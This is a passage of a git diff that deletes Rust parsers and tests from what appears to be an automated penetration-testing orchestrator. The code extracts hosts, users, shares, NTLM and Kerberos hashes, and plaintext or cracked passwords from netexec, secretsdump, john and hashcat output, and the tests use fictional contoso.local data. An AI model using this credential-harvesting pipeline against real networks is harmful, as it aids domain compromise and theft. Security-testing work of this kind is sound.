Some(smb_caps) = RE_SMB_LINE_PASSWORD.captures(stripped) { - smb_caps.get(1).unwrap().as_str().to_string() - } else if let Some(acct_caps) = RE_ACCOUNT.captures(stripped) { - acct_caps.get(1).unwrap().as_str().to_string() - } else if let Some(bracket_caps) = RE_USER_BRACKET.captures(stripped) { - bracket_caps.get(1).unwrap().as_str().to_string() - } else { - // No same-line username found — skip this password. - // The per-tool parser handles structured extraction. - continue; - }; - - if !username.is_empty() && is_valid_credential(&username, &password) { - let key = format!("{}\\{}:{}", current_domain, username, password); - if seen.insert(key) { - credentials.push(make_credential( - &username, - &password, - ¤t_domain, - "description_field", - )); - } - } - } - } - - credentials -} diff --git a/ares-orchestrator/src/output_extraction/shares.rs b/ares-orchestrator/src/output_extraction/shares.rs deleted file mode 100644 index 99556643..00000000 --- a/ares-orchestrator/src/output_extraction/shares.rs +++ /dev/null @@ -1,80 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Share; - -static RE_SMB_IP: LazyLock = - LazyLock::new(|| Regex::new(r"^SMB\s+(\d+\.\d+\.\d+\.\d+)\s+").unwrap()); - -static RE_SMB_PREFIX: LazyLock = - LazyLock::new(|| Regex::new(r"^SMB\s+\S+\s+\d+\s+\S+\s+").unwrap()); - -pub fn extract_shares(output: &str) -> Vec { - let mut shares = Vec::new(); - let mut seen = std::collections::HashSet::new(); - let mut current_ip = String::new(); - let mut in_table = false; - let valid_perms = ["read", "write", "read,write", "write,read"]; - - for line in output.lines() { - let stripped = line.trim(); - - // Track current IP - if let Some(caps) = RE_SMB_IP.captures(stripped) { - current_ip = caps.get(1).unwrap().as_str().to_string(); - } - - // Strip SMB prefix to get body - let body = RE_SMB_PREFIX.replace(stripped, "").to_string(); - let body = body.trim(); - - if body.is_empty() { - continue; - } - - // Detect table header - let body_lower = body.to_lowercase(); - if body_lower.starts_with("share") && body_lower.contains("permission") { - in_table = true; - continue; - } - - // Skip separator lines - if body.chars().all(|c| c == '-' || c == ' ') { - continue; - } - - if in_table && !current_ip.is_empty() { - // Table ends at enumeration summary or empty body - if 
body.starts_with('[') { - in_table = false; - continue; - } - - // Split on whitespace runs (columns are separated by multiple spaces) - let parts: Vec<&str> = body.split_whitespace().collect(); - if parts.len() >= 2 { - let share_name = parts[0].to_string(); - let perm = parts[1].to_lowercase(); - if valid_perms.contains(&perm.as_str()) { - let comment = if parts.len() >= 3 { - parts[2..].join(" ") - } else { - String::new() - }; - let key = format!("{}:{}", current_ip, share_name); - if seen.insert(key) { - shares.push(Share { - host: current_ip.clone(), - name: share_name, - permissions: perm.to_uppercase(), - comment, - }); - } - } - } - } - } - - shares -} diff --git a/ares-orchestrator/src/output_extraction/tests.rs b/ares-orchestrator/src/output_extraction/tests.rs deleted file mode 100644 index 003dc25c..00000000 --- a/ares-orchestrator/src/output_extraction/tests.rs +++ /dev/null @@ -1,538 +0,0 @@ -use super::*; - -#[test] -fn test_extract_ntlm_with_domain() { - let output = - "CONTOSO\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); - assert_eq!(hashes[0].domain, "CONTOSO"); - assert_eq!(hashes[0].hash_type, "ntlm"); - assert!(hashes[0] - .hash_value - .contains("e19ccf75ee54e06b06a5907af13cef42")); -} - -#[test] -fn test_extract_ntlm_without_domain() { - let output = - "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); - assert_eq!(hashes[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_tgs_hash() { - let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "svc_sql"); - assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); - assert_eq!(hashes[0].hash_type, "kerberoast"); -} - -#[test] -fn test_extract_asrep_hash() { - let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456789012345678901234567890abcdef"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "jdoe"); - assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); - assert_eq!(hashes[0].hash_type, "asrep"); -} - -#[test] -fn test_extract_line_wrapped_ntlm() { - let output = - "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75\nee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); -} - -#[test] -fn test_extract_hashes_dedup() { - let output = "\ -CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n\ -CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1, "Should dedup identical hashes"); -} - -#[test] -fn test_extract_hosts_banner() { - let output = "SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].ip, "192.168.58.10"); - assert_eq!(hosts[0].hostname, "dc01.contoso.local"); // FQDN constructed from name+domain - assert!(hosts[0].is_dc); -} - 
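test_extract_hosts_banner above, and the FQDN-construction test that follows, exercise the hostname stitching in the removed hosts.rs: `(name:X)` plus `(domain:Y)` becomes `x.y`, with netexec's stray trailing `0.` stripped first. A self-contained sketch of that construction, assuming the regex crate:

```rust
use regex::Regex;

fn fqdn_from_banner(details: &str) -> Option<String> {
    let re_name = Regex::new(r"\(name:([^)]+)\)").unwrap();
    let re_domain = Regex::new(r"\(domain:([^)]+)\)").unwrap();
    let name = re_name.captures(details)?.get(1)?.as_str().to_lowercase();
    // Strip netexec's trailing "0." artifact, then any trailing dot.
    let domain = re_domain
        .captures(details)?
        .get(1)?
        .as_str()
        .trim_end_matches("0.")
        .trim_end_matches('.')
        .to_lowercase();
    if name.contains('.') || domain.is_empty() {
        return Some(name); // already qualified, or nothing to append
    }
    Some(format!("{name}.{domain}"))
}

fn main() {
    let details = "Windows Server 2019 (name:DC02) (domain:contoso.local0.) (signing:True)";
    assert_eq!(fqdn_from_banner(details).as_deref(), Some("dc02.contoso.local"));
}
```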
-#[test] -fn test_extract_hosts_banner_fqdn_construction() { - // Verify FQDN is built from (name:X)(domain:Y) → x.y - let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:child.contoso.local) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].hostname, "dc02.child.contoso.local"); - assert!(hosts[0].is_dc); -} - -#[test] -fn test_extract_hosts_banner_domain_trailing_zero() { - // netexec sometimes appends "0." to domain — verify it's stripped - let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:contoso.local0.) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].hostname, "dc02.contoso.local"); -} - -#[test] -fn test_extract_hosts_simple() { - let output = "SMB 192.168.58.20 445 SRV01 some output"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].ip, "192.168.58.20"); - assert_eq!(hosts[0].hostname, "SRV01"); -} - -#[test] -fn test_extract_hosts_dedup() { - let output = "\ -SMB 192.168.58.10 445 DC01 [*] Windows (name:DC01) (domain:contoso.local)\n\ -SMB 192.168.58.10 445 DC01 something else"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1, "Should dedup by IP"); - assert_eq!(hosts[0].hostname, "dc01.contoso.local"); -} - -#[test] -fn test_extract_users_domain_backslash() { - let output = "CONTOSO\\alice.johnson (SidTypeUser)"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "alice.johnson"); - assert_eq!(users[0].domain, "CONTOSO"); -} - -#[test] -fn test_extract_users_upn() { - let output = "Found user: bob@contoso.local"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "bob"); - assert_eq!(users[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_users_rpc_format() { - let output = "user:[admin] rid:[0x1f4]"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "admin"); - assert_eq!(users[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_users_samaccountname() { - let output = "sAMAccountName: svc_sql"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "svc_sql"); -} - -#[test] -fn test_extract_users_skip_machine_accounts() { - let output = "CONTOSO\\DC01$ (SidTypeUser)"; - let users = extract_users(output, "contoso.local"); - assert!( - users.is_empty(), - "Machine accounts (ending in $) should be skipped" - ); -} - -#[test] -fn test_extract_users_skip_anonymous() { - let output = "user:[anonymous] rid:[0x1f5]"; - let users = extract_users(output, "contoso.local"); - assert!(users.is_empty()); -} - -#[test] -fn test_extract_users_smb_timestamp() { - let output = "SMB 192.168.58.10 445 DC01 alice.johnson 2026-03-25 23:21:09 0 Alice"; - let users = extract_users(output, "contoso.local"); - assert!(users.iter().any(|u| u.username == "alice.johnson")); -} - -#[test] -fn test_extract_users_domain_context_propagation() { - let output = "\ -[*] Windows (name:DC01) (domain:north.contoso.local)\n\ -user:[alice] rid:[0x1f4]"; - let users = extract_users(output, "contoso.local"); - let alice = users.iter().find(|u| u.username == "alice").unwrap(); - assert_eq!(alice.domain, "north.contoso.local"); -} - -#[test] -fn test_extract_password_from_description() { - let output = - "SMB 
192.168.58.10 445 DC01 dave.miller 2026-03-25 23:22:25 0 Dave Miller (Password : Summer2026!)"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "dave.miller"); - assert_eq!(creds[0].password, "Summer2026!"); -} - -#[test] -fn test_extract_default_password() { - let output = "\ -[*] DefaultPassword\n\ -CONTOSO\\svc_backup:BackupPass123!"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_backup"); - assert_eq!(creds[0].password, "BackupPass123!"); - assert_eq!(creds[0].domain, "CONTOSO"); -} - -#[test] -fn test_extract_password_rejects_paths() { - let output = "Password : /tmp/users.txt"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert!(creds.is_empty()); -} - -/// Regression: stale current_user must never be used for password attribution. -/// Previously, CHILD\john.smith on an earlier line would set current_user, and a -/// later "Password: Summer2025" (belonging to sam.wilson) would be falsely -/// attributed to john.smith. -/// -/// Fix: password lines without a same-line username are skipped entirely. -/// Per-tool parsers handle structured extraction (LDIF, nxc table format). -#[test] -fn test_stale_context_does_not_leak_across_passwords() { - // Simulate secretsdump output followed by LDAP description output - let output = "\ -CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123def456abc123def456abc123de:::\n\ -Password: Summer2025"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - // The password line has no same-line username, so it must be skipped. - // Per-tool parsers handle the structured extraction correctly. - assert!( - creds.is_empty(), - "bare Password: line must not produce credentials" - ); -} - -/// Regression: LDAP attribute order is NOT guaranteed. -/// description may appear BEFORE sAMAccountName within an entry. -/// extract_plaintext_passwords must never misattribute passwords from -/// a previous entry's username context. -#[test] -fn test_ldif_attribute_order_no_misattribution() { - // ldapsearch output where description comes BEFORE sAMAccountName - // and john.smith's entry appears before sam.wilson's - let output = "\ -# john.smith, Users, child.contoso.local\n\ -dn: CN=John Smith,CN=Users,DC=child,DC=contoso,DC=local\n\ -sAMAccountName: john.smith\n\ -description: John Smith\n\ -userPrincipalName: john.smith@child.contoso.local\n\ -\n\ -# sam.wilson, Users, child.contoso.local\n\ -dn: CN=Sam Wilson,CN=Users,DC=child,DC=contoso,DC=local\n\ -description: Sam Wilson (Password : Summer2025)\n\ -sAMAccountName: sam.wilson\n\ -userPrincipalName: sam.wilson@child.contoso.local"; - - let creds = extract_plaintext_passwords(output, "child.contoso.local"); - // The description line has no same-line username — must be skipped. - // john.smith:Summer2025 must NEVER be produced. - assert!( - creds.is_empty(), - "LDIF description without same-line username must not produce credentials, got: {:?}", - creds - ); -} - -/// nxc SMB lines without timestamps should still extract via RE_SMB_LINE_PASSWORD. 
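The stale-context and LDIF-ordering regressions above pin the same-line rule from the removed passwords.rs: a `Password : X` value is attributed only when a username can be matched on that very line, never from earlier context. A sketch of the policy, with a simplified stand-in for the removed SMB username regexes:

```rust
use regex::Regex;

// Returns Some((user, password)) only when both appear on one line.
fn same_line_credential(line: &str) -> Option<(String, String)> {
    let re_pw = Regex::new(r"(?i)Password\s*:\s*([^\s)]+)").unwrap();
    // Simplified stand-in for the removed SMB-line username regexes.
    let re_user = Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s").unwrap();

    let pw = re_pw.captures(line)?.get(1)?.as_str().to_string();
    let user = re_user.captures(line)?.get(1)?.as_str().to_string();
    Some((user, pw))
}

fn main() {
    // Username and password on the same line: attributed.
    let ok = "SMB 10.0.0.5 445 DC01 dave.miller 2026-03-25 (Password : Summer2026!)";
    assert!(same_line_credential(ok).is_some());

    // Bare password line: skipped rather than attributed to stale context.
    assert!(same_line_credential("Password: Summer2025").is_none());
}
```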
-#[test] -fn test_smb_line_without_timestamp() { - let output = - "SMB 192.168.58.10 445 DC01 svc_test 0 Service Account (Password : TestPass!)"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_test"); - assert_eq!(creds[0].password, "TestPass!"); -} - -/// Ensure that two separate tool outputs processed independently don't -/// cross-contaminate username context. -#[test] -fn test_separate_outputs_no_cross_contamination() { - // Tool output 1: secretsdump mentions john.smith - let output1 = "CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123:::\n"; - // Tool output 2: LDAP description with password for sam.wilson - let output2 = "SMB 192.168.58.22 445 DC02 sam.wilson 2026-04-13 Password: Summer2025"; - - // Process separately (as the fix does) - let creds1 = extract_plaintext_passwords(output1, "contoso.local"); - let creds2 = extract_plaintext_passwords(output2, "contoso.local"); - - // output1 should not produce a plaintext credential (it's a hash line) - assert!(creds1.is_empty()); - - // output2 should attribute Summer2025 to sam.wilson, not john.smith - assert_eq!(creds2.len(), 1); - assert_eq!(creds2[0].username, "sam.wilson"); - assert_eq!(creds2[0].password, "Summer2025"); -} - -#[test] -fn test_extract_shares() { - let output = "\ -SMB 192.168.58.10 445 DC01 Share Permissions Remark\n\ -SMB 192.168.58.10 445 DC01 ----- ----------- ------\n\ -SMB 192.168.58.10 445 DC01 SYSVOL READ Logon server share\n\ -SMB 192.168.58.10 445 DC01 ADMIN$ READ,WRITE\n\ -SMB 192.168.58.10 445 DC01 [*] Enumerated 2 shares"; - let shares = extract_shares(output); - assert_eq!(shares.len(), 2); - assert_eq!(shares[0].name, "SYSVOL"); - assert_eq!(shares[0].permissions, "READ"); - assert_eq!(shares[0].host, "192.168.58.10"); - assert_eq!(shares[1].name, "ADMIN$"); - assert_eq!(shares[1].permissions, "READ,WRITE"); -} - -#[test] -fn test_full_extraction() { - let output = "\ -SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)\n\ -SMB 192.168.58.10 445 DC01 [+] contoso.local\\:\n\ -SMB 192.168.58.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description-\n\ -SMB 192.168.58.10 445 DC01 alice 2026-03-25 23:21:09 0 Alice (Password : Welcome1!)\n\ -SMB 192.168.58.10 445 DC01 bob 2026-03-25 23:21:09 0 Bob\n\ -CONTOSO\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:313b6f423a71d74c0a1b8a2f43b22d4c:::"; - - let result = extract_from_output_text(output, "contoso.local"); - assert!(!result.hosts.is_empty(), "Should extract hosts"); - assert!(!result.users.is_empty(), "Should extract users"); - assert!(!result.credentials.is_empty(), "Should extract credentials"); - assert!(!result.hashes.is_empty(), "Should extract hashes"); -} - -#[test] -fn test_empty_output() { - let result = extract_from_output_text("", "contoso.local"); - assert!(result.is_empty()); -} - -#[test] -fn test_extract_netexec_success_credential() { - let output = "\ -SMB 192.168.58.11 445 DC02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC02) (domain:child.contoso.local) (signing:True)\n\ -SMB 192.168.58.11 445 DC02 [-] child.contoso.local\\admin:admin STATUS_LOGON_FAILURE\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; - - let result = extract_from_output_text(output, "child.contoso.local"); - assert_eq!(result.credentials.len(), 1); - assert_eq!(result.credentials[0].username, "jdoe"); - assert_eq!(result.credentials[0].password, "jdoe"); - 
assert_eq!(result.credentials[0].domain, "child.contoso.local"); - assert_eq!(result.credentials[0].source, "netexec_auth"); -} - -#[test] -fn test_extract_netexec_success_with_pwned() { - let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; - - let result = extract_from_output_text(output, "contoso.local"); - assert_eq!(result.credentials.len(), 1); - assert_eq!(result.credentials[0].username, "Administrator"); - assert_eq!(result.credentials[0].password, "P@ssw0rd"); -} - -#[test] -fn test_extract_netexec_guest_filtered() { - let output = "\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\admin:admin (Guest)\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe (Guest)\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\realuser:realpass"; - - let result = extract_from_output_text(output, "child.contoso.local"); - assert_eq!( - result.credentials.len(), - 1, - "Guest lines should be filtered out" - ); - assert_eq!(result.credentials[0].username, "realuser"); - assert_eq!(result.credentials[0].password, "realpass"); -} - -#[test] -fn test_valid_credential_rejects_null_usernames() { - assert!(!is_valid_credential("(none)", "pass")); - assert!(!is_valid_credential("none", "pass")); - assert!(!is_valid_credential("null", "pass")); - assert!(!is_valid_credential("(null)", "pass")); - assert!(!is_valid_credential("(None)", "pass")); -} - -#[test] -fn test_valid_credential_rejects_evil_artifacts() { - assert!(!is_valid_credential("EVIL625686$", "pass")); - assert!(!is_valid_credential("evil12345$", "pass")); - // Non-numeric middle should pass - assert!(is_valid_credential("EVILBOT$", "pass")); -} - -#[test] -fn test_valid_credential_rejects_noise_passwords() { - assert!(!is_valid_credential("user", "(null)")); - assert!(!is_valid_credential("user", "*BLANK*")); - assert!(!is_valid_credential("user", "")); - assert!(!is_valid_credential("user", "N/A")); - assert!(!is_valid_credential("user", "[+]")); - assert!(!is_valid_credential("user", "Password")); - assert!(!is_valid_credential("user", "password")); -} - -#[test] -fn test_valid_credential_accepts_real_passwords() { - assert!(is_valid_credential("admin", "P@ss1")); - assert!(is_valid_credential("jdoe", "jdoe")); - assert!(is_valid_credential("svc_test", "svc_test")); -} - -#[test] -fn test_extract_cracked_tgs_hashcat() { - let output = - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456:Summer2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_sql"); - assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); - assert_eq!(creds[0].password, "Summer2024!"); - assert_eq!(creds[0].source, "cracked:hashcat"); -} - -#[test] -fn test_extract_cracked_asrep_hashcat() { - let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456:Winter2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "jdoe"); - assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); - assert_eq!(creds[0].password, "Winter2024!"); - assert_eq!(creds[0].source, "cracked:hashcat"); -} - -#[test] -fn test_extract_cracked_john_show() { - let output = "svc_sql:Summer2024!::::::::\n1 password hash cracked, 0 left"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_sql"); - assert_eq!(creds[0].password, "Summer2024!"); - assert_eq!(creds[0].source, "cracked:john"); -} - 
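test_extract_cracked_john_show above depends on a context gate in the removed code: bare `user:password` rows are only trusted as john `--show` output when john's own "password hash(es) cracked" summary also appears, which keeps arbitrary colon-separated text from minting credentials. A reduced sketch of that gate:

```rust
fn john_cracked_pairs(output: &str) -> Vec<(String, String)> {
    // Gate on john's summary line before trusting user:password rows.
    let is_john = output.contains("password hash cracked")
        || output.contains("password hashes cracked");
    if !is_john {
        return Vec::new();
    }
    output
        .lines()
        .filter_map(|l| {
            let (user, rest) = l.trim().split_once(':')?;
            let pass = rest.split(':').next()?;
            // Skip empty fields and john's numeric summary rows.
            (!user.is_empty() && !pass.is_empty() && !user.chars().all(|c| c.is_ascii_digit()))
                .then(|| (user.to_string(), pass.to_string()))
        })
        .collect()
}

fn main() {
    let with_ctx = "svc_sql:Summer2024!::::::::\n1 password hash cracked, 0 left";
    assert_eq!(john_cracked_pairs(with_ctx).len(), 1);
    // The same row without the summary line is ignored.
    assert!(john_cracked_pairs("svc_sql:Summer2024!::::::::").is_empty());
}
```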
-#[test] -fn test_extract_cracked_dedup() { - let output = "\ -$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc:Summer2024!\n\ -$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$def:Summer2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1, "Should dedup same user@domain"); -} - -#[test] -fn test_extract_cracked_no_false_positives_on_uncracked() { - // Uncracked TGS hash should NOT produce a cracked credential - let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!( - creds.is_empty(), - "Uncracked hash should not produce credential" - ); -} - -#[test] -fn test_extract_cracked_john_not_triggered_without_context() { - // john --show format should only match if "password hash cracked" context is present - let output = "svc_sql:Summer2024!::::::::"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!( - creds.is_empty(), - "John format without context should not match" - ); -} - -#[test] -fn test_extract_cracked_asrep_john_show_no_hex() { - // John --show for AS-REP omits the hex hash section - let output = "--- john --show ---\n\ - $krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:letmein2025\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "brian.davis"); - assert_eq!(creds[0].password, "letmein2025"); - assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); -} - -#[test] -fn test_extract_cracked_tgs_john_show_unknown_user() { - // John --show for TGS shows ?:password — extract user from TGS hash in same output - let output = "Loaded 1 password hash (krb5tgs)\n\ - $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ - --- john --show ---\n\ - ?:iknownothing\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "john.smith"); - assert_eq!(creds[0].password, "iknownothing"); - assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); - assert_eq!(creds[0].source, "cracked:john"); -} - -#[test] -fn test_extract_cracked_tgs_john_unknown_user_no_hash_context() { - // Without a TGS hash line in the output, ?:password is skipped - let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!(creds.is_empty(), "No TGS hash context = no credential"); -} - -#[test] -fn test_extract_cracked_no_false_positive_on_raw_asrep_hash() { - // Raw GetNPUsers AS-REP hash should NOT produce a cracked credential. - // The hash body is long hex+$ which is_valid_credential must reject. 
- let output = "$krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae8410170fd08daf198b9269344aa64b9ad78f3f5b807dee0e8573e3bdec9fd90d0b46fa56baba08708f716d9b43a9f9bb2481ab56453d7a340f60ac478f6114f4fb0db7a424fd075f4cef9061954bf53ac6ac6dc3b0cc153b1bc909cac6cdcad9337022bf24ad2069d1991e9ca6eced54eb31f0016f3d9a2983c7f95c7f92261a8a1c435300576a98943a34046f4c08ecc4c6e81d9ca7aa3ae9a4baeb0e4071cd27c82203a225e741f4867afd15405552a47145ec3d79f1d5d19a90109b24ea593c26169fbccc54816f288a30c08ff34dc11bc105366685769b3edf9027be1dbad2f770edfa3ccd3f9524e93de40033464f07cdefb0"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert!( - creds.is_empty(), - "Raw AS-REP hash body should not be treated as cracked password" - ); -} - -#[test] -fn test_valid_credential_rejects_hash_body_password() { - // Long hex+$ strings should be rejected as hash fragments - assert!(!is_valid_credential( - "brian.davis", - "7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae" - )); - // Short real passwords should still pass - assert!(is_valid_credential("brian.davis", "letmein2025")); -} diff --git a/ares-orchestrator/src/output_extraction/users.rs b/ares-orchestrator/src/output_extraction/users.rs deleted file mode 100644 index 27dfd2f6..00000000 --- a/ares-orchestrator/src/output_extraction/users.rs +++ /dev/null @@ -1,148 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::User; - -static RE_DOMAIN_CONTEXT: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)\(domain:([^)]+)\)").unwrap()); - -pub(crate) static RE_DOMAIN_BACKSLASH: LazyLock = - LazyLock::new(|| Regex::new(r"([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+)").unwrap()); - -pub(crate) static RE_UPN: LazyLock = LazyLock::new(|| { - Regex::new(r"([A-Za-z0-9_.\-]+)@([A-Za-z0-9_.\-]+\.[A-Za-z0-9_.\-]+)").unwrap() -}); - -pub(crate) static RE_USER_BRACKET: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)user:\[([^\]]+)\]").unwrap()); - -pub(crate) static RE_ACCOUNT: LazyLock = - LazyLock::new(|| Regex::new(r"Account:\s*([A-Za-z0-9_.\-]+)").unwrap()); - -static RE_SAM: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)samaccountname:\s*([A-Za-z0-9_.\-]+)").unwrap()); - -static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { - Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() -}); - -/// Reject garbage usernames and invalid domains from regex extraction. 
-pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { - if username.is_empty() || username.ends_with('$') { - return false; - } - if username.bytes().any(|b| b < 0x20) || domain.bytes().any(|b| b < 0x20) { - return false; - } - if username.len() <= 1 { - return false; - } - let lower = username.to_lowercase(); - const NOISE: &[&str] = &[ - "anonymous", - "none", - "null", - "unknown", - "n/a", - "default", - "test", - "local", - "localhost", - "domain", - "workgroup", - ]; - if NOISE.contains(&lower.as_str()) { - return false; - } - if username.starts_with('_') || domain.starts_with('_') { - return false; - } - if !domain.contains('.') { - if domain.len() > 15 || domain.is_empty() { - return false; - } - if !domain - .bytes() - .all(|b| b.is_ascii_alphanumeric() || b == b'-') - { - return false; - } - } - if !username.bytes().all(|b| b.is_ascii_graphic()) { - return false; - } - true -} - -pub fn extract_users(output: &str, default_domain: &str) -> Vec { - let mut users = Vec::new(); - let mut seen = std::collections::HashSet::new(); - let mut current_domain = default_domain.to_string(); - - for line in output.lines() { - let stripped = line.trim(); - - if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps - .get(1) - .unwrap() - .as_str() - .trim_end_matches('.') - .to_string(); - } - - let mut found = Vec::new(); - - if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { - let dom = caps.get(1).unwrap().as_str(); - let user = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); - } - - if let Some(caps) = RE_UPN.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); - } - - for caps in RE_USER_BRACKET.captures_iter(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_ACCOUNT.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_SAM.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_SMB_TIMESTAMP.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - for (raw_username, raw_domain) in found { - let username = raw_username.trim().trim_end_matches('.').to_string(); - let domain = raw_domain.trim().trim_end_matches('.').to_string(); - if !is_valid_extracted_user(&username, &domain) { - continue; - } - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - users.push(User { - username, - 